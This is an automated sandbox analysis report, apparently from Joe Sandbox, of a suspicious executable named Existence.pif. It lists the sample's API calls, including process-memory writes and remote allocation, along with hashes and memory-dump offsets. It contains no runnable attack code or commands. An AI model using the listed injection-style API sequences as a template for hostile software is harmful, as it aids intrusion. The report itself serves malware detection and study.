• Opcode Fuzzy Hash: 785a6e43924d04afb1b515daaa0942c8e51fbd800488c9c677b09b4efef1739d
• Instruction Fuzzy Hash: 7201DC72801B15DFCB30AFA6D880812FBF9BE903253118F3ED09252921C7B4A848DE90
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003E9), ref: 007965BF
• GetWindowTextW.USER32(00000000,?,00000100), ref: 007965D6
• MessageBeep.USER32(00000000), ref: 007965EE
• KillTimer.USER32(?,0000040A), ref: 0079660A
• EndDialog.USER32(?,00000001), ref: 00796624
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
• Opcode ID: 043c06e796d8336e818c3327640ef72d84a40bce3f9b6e0f1b818809234cfc0b
• Instruction ID: de6dd1b3a562e41fc9c565d298482f6ac6bc769cc07582c5cea6911d10e6a145
• Opcode Fuzzy Hash: 043c06e796d8336e818c3327640ef72d84a40bce3f9b6e0f1b818809234cfc0b
                                                                                                                                                                                          • Instruction Fuzzy Hash: E1011D70500704ABEF315B20EE4EF967BB8BB10745F01466DB586A10E1EBF8AA54CA95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DAD2
                                                                                                                                                                                            • Part of subcall function 00762D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0076DB51,00801DC4,00000000,00801DC4,00000000,?,0076DB78,00801DC4,00000007,00801DC4,?,0076DF75,00801DC4), ref: 00762D4E
                                                                                                                                                                                            • Part of subcall function 00762D38: GetLastError.KERNEL32(00801DC4,?,0076DB51,00801DC4,00000000,00801DC4,00000000,?,0076DB78,00801DC4,00000007,00801DC4,?,0076DF75,00801DC4,00801DC4), ref: 00762D60
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DAE4
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DAF6
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DB08
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DB1A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                          • Opcode ID: 3c573f34ca7979b6987ae6ccf1ed7c0f62c24fcbdfd7e338bd20a69b743ff617
                                                                                                                                                                                          • Instruction ID: 7a5b70060a6a41f01a502ba7ce02b62785a0b14ba91090f52bec5583d8a4f67d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c573f34ca7979b6987ae6ccf1ed7c0f62c24fcbdfd7e338bd20a69b743ff617
                                                                                                                                                                                          • Instruction Fuzzy Hash: B3F06272B18604AB8670EB98E885C6A73EEEE043507954C05F80AD7501CB3CFC80C654
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _free.LIBCMT ref: 0076262E
                                                                                                                                                                                            • Part of subcall function 00762D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0076DB51,00801DC4,00000000,00801DC4,00000000,?,0076DB78,00801DC4,00000007,00801DC4,?,0076DF75,00801DC4), ref: 00762D4E
                                                                                                                                                                                            • Part of subcall function 00762D38: GetLastError.KERNEL32(00801DC4,?,0076DB51,00801DC4,00000000,00801DC4,00000000,?,0076DB78,00801DC4,00000007,00801DC4,?,0076DF75,00801DC4,00801DC4), ref: 00762D60
                                                                                                                                                                                          • _free.LIBCMT ref: 00762640
                                                                                                                                                                                          • _free.LIBCMT ref: 00762653
                                                                                                                                                                                          • _free.LIBCMT ref: 00762664
                                                                                                                                                                                          • _free.LIBCMT ref: 00762675
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                          • Opcode ID: 98878c06591e537295f81af9914968f43494293d26b1899837aa43d70b9961b2
                                                                                                                                                                                          • Instruction ID: 28fbbadaf5f6f8a5e123da3d4c29c254534ec162ba2fee26132522ae3928f2aa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 98878c06591e537295f81af9914968f43494293d26b1899837aa43d70b9961b2
                                                                                                                                                                                          • Instruction Fuzzy Hash: CCF03A709059218BCEE2AF94EC098587BA5BB2A7A1300491BF816D2276CB7C0902BF85
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __freea$_free
                                                                                                                                                                                          • String ID: a/p$am/pm
                                                                                                                                                                                          • API String ID: 3432400110-3206640213
                                                                                                                                                                                          • Opcode ID: 56b0c964ec86d654811c07a1a81d09e2cb7bb76376332e371b3db92d79d15103
                                                                                                                                                                                          • Instruction ID: 8eed765282f996a2aac5bbc6be19c81554799263bce2494825a59c635049173e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 56b0c964ec86d654811c07a1a81d09e2cb7bb76376332e371b3db92d79d15103
                                                                                                                                                                                          • Instruction Fuzzy Hash: 58D1F175900246DACB249F68C85DBBABBB1FF05300FAC415AED03AB651DB7D9D80CB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 007A41FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,007B52EE,?,?,00000035,?), ref: 007A4229
                                                                                                                                                                                            • Part of subcall function 007A41FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,007B52EE,?,?,00000035,?), ref: 007A4239
                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 007B5419
                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 007B550E
                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 007B55CD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLastVariant$ClearFormatInitMessage
                                                                                                                                                                                          • String ID: bny
                                                                                                                                                                                          • API String ID: 2854431205-1723156973
                                                                                                                                                                                          • Opcode ID: cf6fc731066537c716c3bcbb7464cb4f424d8a6c77de348e69462012266f3886
                                                                                                                                                                                          • Instruction ID: 4aadf276e3be253b7d8103ccb9a741ced6faac01d61568d3778e5dedd2cfed94
                                                                                                                                                                                          • Opcode Fuzzy Hash: cf6fc731066537c716c3bcbb7464cb4f424d8a6c77de348e69462012266f3886
                                                                                                                                                                                          • Instruction Fuzzy Hash: AAD14CB0A00649DFDB18DF94C495BEDBBB4FF08304F54811DE416AB292DB79A986CF50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                          • String ID: CALLARGARRAY$bny
                                                                                                                                                                                          • API String ID: 157775604-235381603
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0079BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00792B1D,?,?,00000034,00000800,?,00000034), ref: 0079BDF4
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 007930AD
  • Part of subcall function 0079BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00792B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 0079BDBF
  • Part of subcall function 0079BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 0079BD1C
  • Part of subcall function 0079BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00792AE1,00000034,?,?,00001004,00000000,00000000), ref: 0079BD2C
  • Part of subcall function 0079BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00792AE1,00000034,?,?,00001004,00000000,00000000), ref: 0079BD42
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0079311A
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00793167
Strings
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif,00000104), ref: 00761AD9
• _free.LIBCMT ref: 00761BA4
• _free.LIBCMT ref: 00761BAE
Strings
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif
• API String ID: 2506810119-250674962
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0079CBB1
• DeleteMenu.USER32(?,00000007,00000000), ref: 0079CBF7
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,008029C0,01145390), ref: 0079CC40
Strings
Similarity
• API ID: Menu$Delete$InfoItem
• String ID: 0
• API String ID: 135850232-4108050209
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007CDCD0,00000000,?,?,?,?), ref: 007C4F48
• GetWindowLongW.USER32 ref: 007C4F65
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 007C4F75
Strings
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 007B3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,007B3AD4,?,?), ref: 007B3DD5
• inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 007B3AD7
• _wcslen.LIBCMT ref: 007B3AF8
• htons.WSOCK32(00000000,?,?,00000000), ref: 007B3B63
Strings
Similarity
• API ID: ByteCharMultiWide_wcslenhtonsinet_addr
• String ID: 255.255.255.255
• API String ID: 946324512-2422070025
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007C49DC
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007C49F0
• SendMessageW.USER32(?,00001002,00000000,?), ref: 007C4A14
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
• Opcode ID: 17ab638b9426d52d6022c50c8d5de2ed9ce10374228d38d4ad6e56e809715881
• Instruction ID: 30bb8a414eba8fbed365a20b7a78322c546d7e4af26f18644f8fef55dff2ae81
• Opcode Fuzzy Hash: 17ab638b9426d52d6022c50c8d5de2ed9ce10374228d38d4ad6e56e809715881
• Instruction Fuzzy Hash: 6221BF32600229BBDF218F50CC46FEF3B69EF48718F114218FA157B190D6B9AC51DB90
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007C51A3
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007C51B1
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007C51B8
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950
• Opcode ID: 0ee9c4853a8b7edb5dfff35f3e9b4f09d7b15ea754748b505b093e842ed6d038
• Instruction ID: 2513b9f10155c632c91fa83d49b1d7b6cb1c04d15f6ad9728a203bbc99a08071
• Opcode Fuzzy Hash: 0ee9c4853a8b7edb5dfff35f3e9b4f09d7b15ea754748b505b093e842ed6d038
• Instruction Fuzzy Hash: 962160B5600609AFDB10DF28CC89EB737ADEB593A4B04015DFA009B361CB79EC51CBA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007C42DC
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007C42EC
• MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007C4312
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
• Opcode ID: cbde8687637645eadfeec38c8174ab9150f481b0ddeabdb0a32fc46664150c0f
• Instruction ID: 4e553ccab27b5e54ab5a75067e3d2d96976919f5fa4e3a0f40dd4ae438d7fe12
• Opcode Fuzzy Hash: cbde8687637645eadfeec38c8174ab9150f481b0ddeabdb0a32fc46664150c0f
• Instruction Fuzzy Hash: 74218372610118BBEF218F94DC85FAB3B6EEB89754F11812CF9009B190C6759C51C790
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(00000001), ref: 007A544D
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007A54A1
• SetErrorMode.KERNEL32(00000000,?,?,007CDCD0), ref: 007A5515
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: %lu
• API String ID: 2507767853-685833217
• Opcode ID: f9f1bd9780cbfb9599fe35e98a59c05fd77ed487c2655c245b0e9c467407bce0
• Instruction ID: 635abd4c198d548be8fb7bd0cca8a6d344a94f3c6f557d0b4112f030637f5bfc
• Opcode Fuzzy Hash: f9f1bd9780cbfb9599fe35e98a59c05fd77ed487c2655c245b0e9c467407bce0
• Instruction Fuzzy Hash: BD317371A00108EFDB10DF64C885EAA77F9EF09304F1480A9F509DB262D779EE45CB61
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007C4CED
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007C4D02
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007C4D0F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: 830bb7141b35497fe273eaa360853f67b3fe3f47bc86790d3853d891c61aa061
• Instruction ID: 0ce3dd5099716814eaf99bd9a48e0ddeca04ba411fe29291d52ae5e199eba548
• Opcode Fuzzy Hash: 830bb7141b35497fe273eaa360853f67b3fe3f47bc86790d3853d891c61aa061
• Instruction Fuzzy Hash: F6110671340248BEEF205F65CC06FAB37A8EF85B65F11052CFA51E60A0D675DC50DB20
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00738577: _wcslen.LIBCMT ref: 0073858A
  • Part of subcall function 007936F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00793712
  • Part of subcall function 007936F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00793723
  • Part of subcall function 007936F4: GetCurrentThreadId.KERNEL32 ref: 0079372A
  • Part of subcall function 007936F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00793731
• GetFocus.USER32 ref: 007938C4
  • Part of subcall function 0079373B: GetParent.USER32(00000000), ref: 00793746
• GetClassNameW.USER32(?,?,00000100), ref: 0079390F
• EnumChildWindows.USER32(?,00793987), ref: 00793937
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                          • String ID: %s%d
                                                                                                                                                                                          • API String ID: 1272988791-1110647743
                                                                                                                                                                                          • Opcode ID: dd39491dee5bf5f1c200758ed891fbe21085951ae5bd5e83e3ff868d9b95b695
                                                                                                                                                                                          • Instruction ID: de889981e124ed8f72886c09f8cad4a8c87b014c10eb4b40e1433fd2c17afdb2
                                                                                                                                                                                          • Opcode Fuzzy Hash: dd39491dee5bf5f1c200758ed891fbe21085951ae5bd5e83e3ff868d9b95b695
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B11A8B1600205ABDF11BF749C89EED77699F94354F048079F9099B252DF785A05CB30
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007C6360
• SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007C638D
• DrawMenuBar.USER32(?), ref: 007C639C
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Menu$InfoItem$Draw
• String ID: 0
• API String ID: 3227129158-4108050209
• Opcode ID: 22b7df874ad3920a2a96c9b1ff3e0d5843deeea9781a9f7691d8d3986a0f939f
• Instruction ID: e66fa3c1b015849cedd77a56a12a99ee5a30cf51184ab69658020ee14247d8b1
• Opcode Fuzzy Hash: 22b7df874ad3920a2a96c9b1ff3e0d5843deeea9781a9f7691d8d3986a0f939f
• Instruction Fuzzy Hash: D7016971500258EFEB219F51DC88FAEBBB4FF44351F1080ADE84AD6151DB788A95EF22
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b818791a337a0178c7f7ded64a552242c483dee44fd7c7bd68119fae169e11cc
• Instruction ID: 0d5a364b5d632886040995bcceb65efe5098daf84cde4de518098c2fce598955
• Opcode Fuzzy Hash: b818791a337a0178c7f7ded64a552242c483dee44fd7c7bd68119fae169e11cc
• Instruction Fuzzy Hash: EEC18B75A1020AEFDB04CFA4D884EAEB7B5FF48714F108598E905EB251D735EE81DB90
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
